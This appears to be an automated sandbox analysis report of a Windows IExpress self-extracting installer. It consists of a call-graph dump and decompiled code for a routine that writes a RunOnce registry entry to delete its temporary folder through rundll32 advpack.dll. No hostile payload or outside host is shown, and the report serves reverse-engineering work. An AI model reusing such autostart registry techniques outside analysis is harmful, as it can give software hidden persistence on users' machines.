2958->2962 2961 a42165 2959->2961 2959->2962 2960->2946 2963 a4658a CharPrevA 2961->2963 2962->2962 2964 a421b7 LocalAlloc 2962->2964 2963->2962 2965 a421ec 2964->2965 2966 a421cd 2964->2966 2968 a4171e _vsnprintf 2965->2968 2967 a444b9 20 API calls 2966->2967 2967->2960 2969 a42218 RegSetValueExA RegCloseKey LocalFree 2968->2969 2969->2946 2972 a44016 CreateProcessA 2971->2972 2973 a44106 2971->2973 2974 a440c4 2972->2974 2975 a44041 WaitForSingleObject GetExitCodeProcess 2972->2975 2976 a46ce0 4 API calls 2973->2976 2977 a46285 GetLastError 2974->2977 2983 a44070 2975->2983 2978 a44117 2976->2978 2980 a440c9 GetLastError FormatMessageA 2977->2980 2978->2679 2982 a444b9 20 API calls 2980->2982 2981 a44096 CloseHandle CloseHandle 2981->2973 2984 a440ba 2981->2984 2982->2973 3042 a4411b 2983->3042 2984->2973 2986 a464c2 2985->2986 2987 a4658a CharPrevA 2986->2987 2988 a464d8 GetFileAttributesA 2987->2988 2989 a46501 LoadLibraryA 2988->2989 2990 a464ea 2988->2990 2992 a46508 2989->2992 2990->2989 2991 a464ee LoadLibraryExA 2990->2991 2991->2992 2993 a46ce0 4 API calls 2992->2993 2994 a46513 2993->2994 2994->2696 2996 a42289 RegOpenKeyExA 2995->2996 2998 a42381 2995->2998 2996->2998 2999 a422b1 RegQueryValueExA 2996->2999 2997 a46ce0 4 API calls 3000 a4238c 2997->3000 2998->2997 3001 a42374 RegCloseKey 2999->3001 3002 a422e6 memset GetSystemDirectoryA 2999->3002 3000->2674 3001->2998 3003 a42321 3002->3003 3004 a4230f 3002->3004 3006 a4171e _vsnprintf 3003->3006 3005 a4658a CharPrevA 3004->3005 3005->3003 3007 a4233f RegSetValueExA 3006->3007 3007->3001 3010 a41a9a 3009->3010 3012 a41aba 3010->3012 3014 a41aaf 3010->3014 3028 a4667f 3010->3028 3012->2907 3013 a4667f 2 API calls 3013->3014 3014->3012 3014->3013 3016 a42ad4 GetModuleFileNameA 3015->3016 3019 a42be6 3015->3019 3027 a42b02 3016->3027 3017 a46ce0 4 API calls 3018 a42bf5 3017->3018 3018->2925 3019->3017 3020 a42af1 IsDBCSLeadByte 3020->3027 3021 a42b11 CharNextA CharUpperA 3023 a42b8d CharUpperA 3021->3023 3021->3027 3022 a42bca CharNextA 3024 a42bd3 CharNextA 3022->3024 3023->3027 3024->3027 3026 a42b43 CharPrevA 3026->3027 3027->3019 3027->3020 3027->3021 3027->3022 3027->3024 3027->3026 3033 a465e8 3027->3033 3029 a46689 3028->3029 3030 a46648 IsDBCSLeadByte 3029->3030 3031 a46697 CharNextA 3029->3031 3032 a466a5 3029->3032 3030->3029 3031->3029 3032->3010 3034 a465f4 3033->3034 3034->3034 3035 a465fb CharPrevA 3034->3035 3036 a46611 CharPrevA 3035->3036 3037 a4661e 3036->3037 3038 a4660b 3036->3038 3039 a4663d 3037->3039 3040 a46634 CharNextA 3037->3040 3041 a46627 CharPrevA 3037->3041 3038->3036 3038->3037 3039->3027 3040->3039 3041->3039 3041->3040 3043 a44132 3042->3043 3045 a4412a 3042->3045 3046 a41ea7 3043->3046 3045->2981 3047 a41ed3 3046->3047 3048 a41eba 3046->3048 3047->3045 3049 a4256d 15 API calls 3048->3049 3049->3047 3051 a42026 3050->3051 3052 a41ff0 RegOpenKeyExA 3050->3052 3051->2321 3052->3051 3053 a4200f RegDeleteValueA RegCloseKey 3052->3053 3053->3051 3119 a419e0 3120 a41a24 GetDesktopWindow 3119->3120 3121 a41a03 3119->3121 3128 a443d0 6 API calls 3120->3128 3123 a41a20 3121->3123 3125 a41a16 EndDialog 3121->3125 3126 a46ce0 4 API calls 3123->3126 3125->3123 3127 a41a7e 3126->3127 3129 a44463 SetWindowPos 3128->3129 3131 a46ce0 4 API calls 3129->3131 3132 a41a33 LoadStringA SetDlgItemTextA MessageBeep 3131->3132 3132->3123 3133 a46a20 __getmainargs 3134 a46bef _XcptFilter 3135 a469b0 3136 a469b5 3135->3136 3144 a46fbe GetModuleHandleW 3136->3144 3138 a469c1 __set_app_type __p__fmode __p__commode 3139 a469f9 3138->3139 3140 a46a02 __setusermatherr 3139->3140 3141 a46a0e 3139->3141 3140->3141 3146 a471ef _controlfp 3141->3146 3143 a46a13 3145 a46fcf 3144->3145 3145->3138 3146->3143 3147 a434f0 3148 a43504 3147->3148 3166 a435b8 3147->3166 3150 a435be GetDesktopWindow 3148->3150 3151 a4351b 3148->3151 3148->3166 3149 a43526 3155 a443d0 11 API calls 3150->3155 3152 a4354f 3151->3152 3153 a4351f 3151->3153 3152->3149 3157 a43559 ResetEvent 3152->3157 3153->3149 3156 a4352d TerminateThread EndDialog 3153->3156 3154 a43671 EndDialog 3154->3149 3158 a435d6 3155->3158 3156->3149 3159 a444b9 20 API calls 3157->3159 3160 a435e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3158->3160 3161 a4361d SetWindowTextA CreateThread 3158->3161 3163 a43581 3159->3163 3160->3161 3161->3149 3162 a43646 3161->3162 3164 a444b9 20 API calls 3162->3164 3165 a4359b SetEvent 3163->3165 3167 a4358a SetEvent 3163->3167 3164->3166 3168 a43680 4 API calls 3165->3168 3166->3149 3166->3154 3167->3149 3168->3166 3169 a46ef0 3170 a46f2d 3169->3170 3172 a46f02 3169->3172 3171 a46f27 ?terminate@ 3171->3170 3172->3170 3172->3171 3173 a47270 _except_handler4_common 3054 a44cc0 GlobalFree 3055 a46f40 SetUnhandledExceptionFilter 3174 a44bc0 3175 a44c05 3174->3175 3177 a44bd7 3174->3177 3176 a44c1b SetFilePointer 3175->3176 3175->3177 3176->3177 3178 a430c0 3179 a430de CallWindowProcA 3178->3179 3180 a430ce 3178->3180 3181 a430da 3179->3181 3180->3179 3180->3181 3182 a463c0 3183 a46407 3182->3183 3184 a4658a CharPrevA 3183->3184 3185 a46415 CreateFileA 3184->3185 3186 a46448 WriteFile 3185->3186 3187 a4643a 3185->3187 3188 a46465 CloseHandle 3186->3188 3189 a46ce0 4 API calls 3187->3189 3188->3187 3191 a4648f 3189->3191 3192 a43100 3193 a431b0 3192->3193 3194 a43111 3192->3194 3195 a431b9 SendDlgItemMessageA 3193->3195 3196 a43141 3193->3196 3198 a43149 GetDesktopWindow 3194->3198 3200 a4311d 3194->3200 3195->3196 3197 a43138 EndDialog 3197->3196 3199 a443d0 11 API calls 3198->3199 3201 a4315d 6 API calls 3199->3201 3200->3196 3200->3197 3201->3196 3202 a44200 3203 a4421e 3202->3203 3204 a4420b SendMessageA 3202->3204 3204->3203 3205 a46c03 3206 a46c17 _exit 3205->3206 3207 a46c1e 3205->3207 3206->3207 3208 a46c27 _cexit 3207->3208 3209 a46c32 3207->3209 3208->3209 3056 a44cd0 3057 a44cf4 3056->3057 3058 a44d0b 3056->3058 3059 a44d02 3057->3059 3060 a44b60 FindCloseChangeNotification 3057->3060 3058->3059 3062 a44dcb 3058->3062 3065 a44d25 3058->3065 3061 a46ce0 4 API calls 3059->3061 3060->3059 3064 a44e95 3061->3064 3063 a44dd4 SetDlgItemTextA 3062->3063 3066 a44de3 3062->3066 3063->3066 3065->3059 3079 a44c37 3065->3079 3066->3059 3084 a4476d 3066->3084 3069 a44e38 3069->3059 3071 a44980 25 API calls 3069->3071 3073 a44e56 3071->3073 3072 a44b60 FindCloseChangeNotification 3074 a44d99 SetFileAttributesA 3072->3074 3073->3059 3075 a44e64 3073->3075 3074->3059 3093 a447e0 LocalAlloc 3075->3093 3078 a44e6f 3078->3059 3080 a44c4c DosDateTimeToFileTime 3079->3080 3081 a44c88 3079->3081 3080->3081 3082 a44c5e LocalFileTimeToFileTime 3080->3082 3081->3059 3081->3072 3082->3081 3083 a44c70 SetFileTime 3082->3083 3083->3081 3102 a466ae GetFileAttributesA 3084->3102 3086 a4477b 3086->3069 3087 a447cc SetFileAttributesA 3089 a447db 3087->3089 3089->3069 3090 a46517 24 API calls 3091 a447b1 3090->3091 3091->3087 3091->3089 3092 a447c2 3091->3092 3092->3087 3094 a447f6 3093->3094 3095 a4480f LocalAlloc 3093->3095 3096 a444b9 20 API calls 3094->3096 3098 a44831 3095->3098 3101 a4480b 3095->3101 3096->3101 3099 a444b9 20 API calls 3098->3099 3100 a44846 LocalFree 3099->3100 3100->3101 3101->3078 3103 a44777 3102->3103 3103->3086 3103->3087 3103->3090 3104 a44ad0 3112 a43680 3104->3112 3107 a44aee WriteFile 3109 a44b0f 3107->3109 3110 a44b14 3107->3110 3108 a44ae9 3110->3109 3111 a44b3b SendDlgItemMessageA 3110->3111 3111->3109 3113 a43691 MsgWaitForMultipleObjects 3112->3113 3114 a436e8 3113->3114 3115 a436a9 PeekMessageA 3113->3115 3114->3107 3114->3108 3115->3113 3117 a436bc 3115->3117 3116 a436c7 DispatchMessageA 3118 a436d1 PeekMessageA 3116->3118 3117->3113 3117->3114 3117->3116 3117->3118 3118->3117 3210 a43210 3211 a43227 3210->3211 3212 a4328e EndDialog 3210->3212 3213 a43235 3211->3213 3214 a433e2 GetDesktopWindow 3211->3214 3229 a43239 3212->3229 3218 a4324c 3213->3218 3219 a432dd GetDlgItemTextA 3213->3219 3213->3229 3216 a443d0 11 API calls 3214->3216 3217 a433f1 SetWindowTextA SendDlgItemMessageA 3216->3217 3220 a4341f GetDlgItem EnableWindow 3217->3220 3217->3229 3222 a432c5 EndDialog 3218->3222 3223 a43251 3218->3223 3221 a43366 3219->3221 3230 a432fc 3219->3230 3220->3229 3225 a444b9 20 API calls 3221->3225 3222->3229 3224 a4325c LoadStringA 3223->3224 3223->3229 3226 a43294 3224->3226 3227 a4327b 3224->3227 3225->3229 3248 a44224 LoadLibraryA 3226->3248 3233 a444b9 20 API calls 3227->3233 3230->3221 3232 a43331 GetFileAttributesA 3230->3232 3235 a4337c 3232->3235 3236 a4333f 3232->3236 3233->3212 3234 a432a5 SetDlgItemTextA 3234->3227 3234->3229 3237 a4658a CharPrevA 3235->3237 3238 a444b9 20 API calls 3236->3238 3239 a4338d 3237->3239 3240 a43351 3238->3240 3242 a458c8 27 API calls 3239->3242 3240->3229 3241 a4335a CreateDirectoryA 3240->3241 3241->3221 3241->3235 3243 a43394 3242->3243 3243->3221 3244 a433a4 3243->3244 3245 a433c7 EndDialog 3244->3245 3246 a4597d 34 API calls 3244->3246 3245->3229 3247 a433c3 3246->3247 3247->3229 3247->3245 3249 a44246 GetProcAddress 3248->3249 3250 a443b2 3248->3250 3251 a443a4 FreeLibrary 3249->3251 3252 a4425d GetProcAddress 3249->3252 3254 a444b9 20 API calls 3250->3254 3251->3250 3252->3251 3253 a44274 GetProcAddress 3252->3253 3253->3251 3255 a4428b 3253->3255 3257 a4329d 3254->3257 3256 a44295 GetTempPathA 3255->3256 3262 a442e1 3255->3262 3258 a442ad 3256->3258 3257->3229 3257->3234 3258->3258 3259 a442b4 CharPrevA 3258->3259 3260 a442d0 CharPrevA 3259->3260 3259->3262 3260->3262 3261 a44390 FreeLibrary 3261->3257 3262->3261 3263 a44a50 3264 a44a66 3263->3264 3265 a44a9f ReadFile 3263->3265 3266 a44a82 memcpy 3264->3266 3267 a44abb 3264->3267 3265->3267 3266->3267 3268 a43450 3269 a434d3 EndDialog 3268->3269 3270 a4345e 3268->3270 3271 a4346a 3269->3271 3272 a4349a GetDesktopWindow 3270->3272 3276 a43465 3270->3276 3273 a443d0 11 API calls 3272->3273 3274 a434ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3273->3274 3274->3271 3275 a4348c EndDialog 3275->3271 3276->3271 3276->3275

                                                                                                                                                                                                                                            Callgraph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            • Opacity -> Relevance
                                                                                                                                                                                                                                            • Disassembly available
                                                                                                                                                                                                                                            callgraph 0 Function_00A46FA5 113 Function_00A4724D 0->113 1 Function_00A41EA7 103 Function_00A4256D 1->103 2 Function_00A455A0 16 Function_00A444B9 2->16 18 Function_00A46285 2->18 23 Function_00A41781 2->23 24 Function_00A4468F 2->24 26 Function_00A4658A 2->26 38 Function_00A46CE0 2->38 77 Function_00A42630 2->77 88 Function_00A46517 2->88 97 Function_00A45467 2->97 109 Function_00A4597D 2->109 119 Function_00A46952 2->119 3 Function_00A44CA0 4 Function_00A453A1 22 Function_00A41680 4->22 4->26 4->38 93 Function_00A4171E 4->93 5 Function_00A46FA1 6 Function_00A43BA2 6->16 6->18 6->23 6->24 28 Function_00A46495 6->28 6->38 45 Function_00A43FEF 6->45 48 Function_00A41AE8 6->48 74 Function_00A4202A 6->74 98 Function_00A42267 6->98 7 Function_00A472A2 8 Function_00A418A3 8->38 44 Function_00A417EE 8->44 9 Function_00A42AAC 9->22 9->38 50 Function_00A465E8 9->50 65 Function_00A417C8 9->65 10 Function_00A466AE 11 Function_00A42CAA 11->8 11->16 11->24 29 Function_00A42390 11->29 32 Function_00A45C9E 11->32 11->38 43 Function_00A436EE 11->43 11->88 12 Function_00A452B6 12->23 12->29 12->38 42 Function_00A41FE1 12->42 12->50 13 Function_00A469B0 15 Function_00A46FBE 13->15 46 Function_00A471EF 13->46 82 Function_00A47000 13->82 107 Function_00A46C70 13->107 14 Function_00A416B3 14->23 115 Function_00A46F54 15->115 16->22 16->38 66 Function_00A467C9 16->66 16->93 94 Function_00A4681F 16->94 17 Function_00A41A84 110 Function_00A4667F 17->110 19 Function_00A46380 20 Function_00A43680 21 Function_00A44980 21->16 111 Function_00A4487A 21->111 22->23 25 Function_00A42A89 26->14 27 Function_00A4268B 27->16 27->38 27->93 28->23 28->26 28->38 29->14 29->22 29->26 29->29 29->38 30 Function_00A41F90 30->1 30->16 30->38 31 Function_00A46793 32->16 32->22 32->26 37 Function_00A431E0 32->37 32->38 64 Function_00A466C8 32->64 75 Function_00A46E2A 32->75 87 Function_00A45C17 32->87 32->110 33 Function_00A46298 33->38 33->93 34 Function_00A44E99 34->22 35 Function_00A451E5 35->16 35->18 35->24 36 Function_00A44FE0 36->16 36->24 55 Function_00A44EFD 36->55 52 Function_00A46CF0 38->52 39 Function_00A424E0 39->26 39->38 40 Function_00A419E0 40->38 69 Function_00A443D0 40->69 41 Function_00A447E0 41->16 41->22 43->16 43->25 43->38 49 Function_00A428E8 43->49 43->66 43->94 44->38 45->16 45->18 45->38 95 Function_00A4411B 45->95 47 Function_00A46BEF 48->9 48->14 48->16 48->17 48->22 48->23 48->26 48->38 48->64 48->93 49->25 108 Function_00A42773 49->108 51 Function_00A470EB 53 Function_00A434F0 53->16 53->20 53->69 54 Function_00A46EF0 55->21 55->38 99 Function_00A44B60 55->99 56 Function_00A470FE 57 Function_00A466F9 58 Function_00A42BFB 58->11 58->12 58->30 91 Function_00A42F1D 58->91 59 Function_00A44CC0 60 Function_00A44BC0 61 Function_00A430C0 62 Function_00A463C0 62->23 62->26 62->38 63 Function_00A458C8 63->16 63->18 63->22 63->26 114 Function_00A46648 64->114 66->31 67 Function_00A44AD0 67->20 68 Function_00A44CD0 68->21 68->34 68->38 68->41 76 Function_00A44C37 68->76 83 Function_00A44702 68->83 68->99 104 Function_00A4476D 68->104 69->38 70 Function_00A44224 70->16 70->22 71 Function_00A43B26 71->33 71->36 71->88 72 Function_00A47120 73 Function_00A46A20 74->16 74->26 74->38 74->93 75->52 77->16 77->38 78 Function_00A43A3F 78->16 78->18 78->24 78->88 79 Function_00A46C3F 80 Function_00A43100 80->69 81 Function_00A44200 83->14 83->22 84 Function_00A46C03 84->113 85 Function_00A4490C 86 Function_00A47208 88->16 89 Function_00A47010 90 Function_00A43210 90->16 90->26 90->63 90->69 90->70 90->109 91->2 91->6 91->16 91->18 91->26 91->35 91->38 91->71 91->78 92 Function_00A4621E 91->92 96 Function_00A45164 91->96 91->103 105 Function_00A44169 91->105 92->16 92->18 92->38 92->109 94->38 94->57 95->1 96->16 96->24 96->33 97->4 97->18 97->22 97->23 97->26 97->38 97->63 97->109 98->26 98->38 98->93 100 Function_00A46A60 100->58 100->79 100->86 101 Function_00A47060 100->101 100->113 116 Function_00A47155 100->116 101->72 101->89 102 Function_00A46760 103->39 104->10 104->88 105->16 105->24 106 Function_00A47270 108->22 108->23 108->26 108->38 109->16 109->18 109->27 109->38 110->114 111->85 112 Function_00A46F40 115->86 115->113 117 Function_00A44A50 118 Function_00A43450 118->69

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00A4202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v528;
                                                                                                                                                                                                                                            				void* _v532;
                                                                                                                                                                                                                                            				int _v536;
                                                                                                                                                                                                                                            				int _v540;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            				long _t36;
                                                                                                                                                                                                                                            				long _t41;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t46;
                                                                                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                                                                                                            				CHAR* _t54;
                                                                                                                                                                                                                                            				void _t56;
                                                                                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                                                                                            				intOrPtr* _t72;
                                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                                            				void* _t80;
                                                                                                                                                                                                                                            				intOrPtr* _t81;
                                                                                                                                                                                                                                            				void* _t86;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				void* _t90;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                                                            				signed int _t93;
                                                                                                                                                                                                                                            				void* _t94;
                                                                                                                                                                                                                                            				void* _t95;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t79 = __edx;
                                                                                                                                                                                                                                            				_t28 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                                                            				_t84 = 0x104;
                                                                                                                                                                                                                                            				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                            				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                                                            				_t95 = _t94 + 0x18;
                                                                                                                                                                                                                                            				_t66 = 0;
                                                                                                                                                                                                                                            				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                                                            				if(_t36 != 0) {
                                                                                                                                                                                                                                            					L24:
                                                                                                                                                                                                                                            					return E00A46CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(_t86);
                                                                                                                                                                                                                                            				_t87 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					E00A4171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                                                            					_t95 = _t95 + 0x10;
                                                                                                                                                                                                                                            					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                                                            					if(_t41 != 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t87 = _t87 + 1;
                                                                                                                                                                                                                                            					if(_t87 < 0xc8) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t87 != 0xc8) {
                                                                                                                                                                                                                                            					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                                                            					_t79 = _t84;
                                                                                                                                                                                                                                            					E00A4658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                                                            					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                                                            					_t84 = _t46;
                                                                                                                                                                                                                                            					if(_t84 == 0) {
                                                                                                                                                                                                                                            						L10:
                                                                                                                                                                                                                                            						if(GetModuleFileNameA( *0xa49a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            							L17:
                                                                                                                                                                                                                                            							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                            							L23:
                                                                                                                                                                                                                                            							_pop(_t86);
                                                                                                                                                                                                                                            							goto L24;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                            						_t72 =  &_v268;
                                                                                                                                                                                                                                            						_t80 = _t72 + 1;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t49 =  *_t72;
                                                                                                                                                                                                                                            							_t72 = _t72 + 1;
                                                                                                                                                                                                                                            						} while (_t49 != 0);
                                                                                                                                                                                                                                            						_t73 = _t72 - _t80;
                                                                                                                                                                                                                                            						_t81 = 0xa491e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t50 =  *_t81;
                                                                                                                                                                                                                                            							_t81 = _t81 + 1;
                                                                                                                                                                                                                                            						} while (_t50 != 0);
                                                                                                                                                                                                                                            						_t84 = _t73 + 0x50 + _t81 - 0xa491e5;
                                                                                                                                                                                                                                            						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xa491e5);
                                                                                                                                                                                                                                            						if(_t90 != 0) {
                                                                                                                                                                                                                                            							 *0xa48580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                                                            							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                                                            							if(_t66 == 0) {
                                                                                                                                                                                                                                            								_t54 = "%s /D:%s";
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                            							E00A4171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                                                            							_t75 = _t90;
                                                                                                                                                                                                                                            							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                                                            							_t79 = _t23;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t56 =  *_t75;
                                                                                                                                                                                                                                            								_t75 = _t75 + 1;
                                                                                                                                                                                                                                            							} while (_t56 != 0);
                                                                                                                                                                                                                                            							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                                                            							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                                                            							RegCloseKey(_v532); // executed
                                                                                                                                                                                                                                            							_t36 = LocalFree(_t90);
                                                                                                                                                                                                                                            							goto L23;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t79 = 0x4b5;
                                                                                                                                                                                                                                            						E00A444B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                                                            						goto L17;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                                                            					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                                                            					FreeLibrary(_t84); // executed
                                                                                                                                                                                                                                            					if(_t91 == 0) {
                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            						E00A4658A( &_v268, 0x104, 0xa41140);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                            				 *0xa48530 = _t66;
                                                                                                                                                                                                                                            				goto L23;
                                                                                                                                                                                                                                            			}

































                                                                                                                                                                                                                                            0x00a4202a
                                                                                                                                                                                                                                            0x00a42035
                                                                                                                                                                                                                                            0x00a4203c
                                                                                                                                                                                                                                            0x00a42041
                                                                                                                                                                                                                                            0x00a42050
                                                                                                                                                                                                                                            0x00a4205f
                                                                                                                                                                                                                                            0x00a42064
                                                                                                                                                                                                                                            0x00a4206f
                                                                                                                                                                                                                                            0x00a4208c
                                                                                                                                                                                                                                            0x00a42094
                                                                                                                                                                                                                                            0x00a42257
                                                                                                                                                                                                                                            0x00a42266
                                                                                                                                                                                                                                            0x00a42266
                                                                                                                                                                                                                                            0x00a4209a
                                                                                                                                                                                                                                            0x00a4209b
                                                                                                                                                                                                                                            0x00a4209d
                                                                                                                                                                                                                                            0x00a420aa
                                                                                                                                                                                                                                            0x00a420af
                                                                                                                                                                                                                                            0x00a420c9
                                                                                                                                                                                                                                            0x00a420d1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a420d3
                                                                                                                                                                                                                                            0x00a420da
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a420da
                                                                                                                                                                                                                                            0x00a420e2
                                                                                                                                                                                                                                            0x00a42103
                                                                                                                                                                                                                                            0x00a4210e
                                                                                                                                                                                                                                            0x00a42116
                                                                                                                                                                                                                                            0x00a42122
                                                                                                                                                                                                                                            0x00a42128
                                                                                                                                                                                                                                            0x00a4212c
                                                                                                                                                                                                                                            0x00a42179
                                                                                                                                                                                                                                            0x00a42194
                                                                                                                                                                                                                                            0x00a421de
                                                                                                                                                                                                                                            0x00a421e4
                                                                                                                                                                                                                                            0x00a42256
                                                                                                                                                                                                                                            0x00a42256
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42256
                                                                                                                                                                                                                                            0x00a42196
                                                                                                                                                                                                                                            0x00a42196
                                                                                                                                                                                                                                            0x00a4219c
                                                                                                                                                                                                                                            0x00a4219f
                                                                                                                                                                                                                                            0x00a4219f
                                                                                                                                                                                                                                            0x00a421a1
                                                                                                                                                                                                                                            0x00a421a2
                                                                                                                                                                                                                                            0x00a421a6
                                                                                                                                                                                                                                            0x00a421a8
                                                                                                                                                                                                                                            0x00a421b0
                                                                                                                                                                                                                                            0x00a421b0
                                                                                                                                                                                                                                            0x00a421b2
                                                                                                                                                                                                                                            0x00a421b3
                                                                                                                                                                                                                                            0x00a421bc
                                                                                                                                                                                                                                            0x00a421c7
                                                                                                                                                                                                                                            0x00a421cb
                                                                                                                                                                                                                                            0x00a421f1
                                                                                                                                                                                                                                            0x00a421f6
                                                                                                                                                                                                                                            0x00a421fd
                                                                                                                                                                                                                                            0x00a421ff
                                                                                                                                                                                                                                            0x00a421ff
                                                                                                                                                                                                                                            0x00a42204
                                                                                                                                                                                                                                            0x00a42213
                                                                                                                                                                                                                                            0x00a42218
                                                                                                                                                                                                                                            0x00a4221d
                                                                                                                                                                                                                                            0x00a4221d
                                                                                                                                                                                                                                            0x00a42220
                                                                                                                                                                                                                                            0x00a42220
                                                                                                                                                                                                                                            0x00a42222
                                                                                                                                                                                                                                            0x00a42223
                                                                                                                                                                                                                                            0x00a42229
                                                                                                                                                                                                                                            0x00a4223d
                                                                                                                                                                                                                                            0x00a42249
                                                                                                                                                                                                                                            0x00a42250
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42250
                                                                                                                                                                                                                                            0x00a421d2
                                                                                                                                                                                                                                            0x00a421d9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a421d9
                                                                                                                                                                                                                                            0x00a4213a
                                                                                                                                                                                                                                            0x00a42141
                                                                                                                                                                                                                                            0x00a42144
                                                                                                                                                                                                                                            0x00a4214c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42163
                                                                                                                                                                                                                                            0x00a42172
                                                                                                                                                                                                                                            0x00a42172
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42163
                                                                                                                                                                                                                                            0x00a420ea
                                                                                                                                                                                                                                            0x00a420f0
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A42050
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A4205F
                                                                                                                                                                                                                                            • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00A4208C
                                                                                                                                                                                                                                              • Part of subcall function 00A4171E: _vsnprintf.MSVCRT ref: 00A41750
                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A420C9
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A420EA
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00A42103
                                                                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A42122
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00A42134
                                                                                                                                                                                                                                            • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A42144
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00A4215B
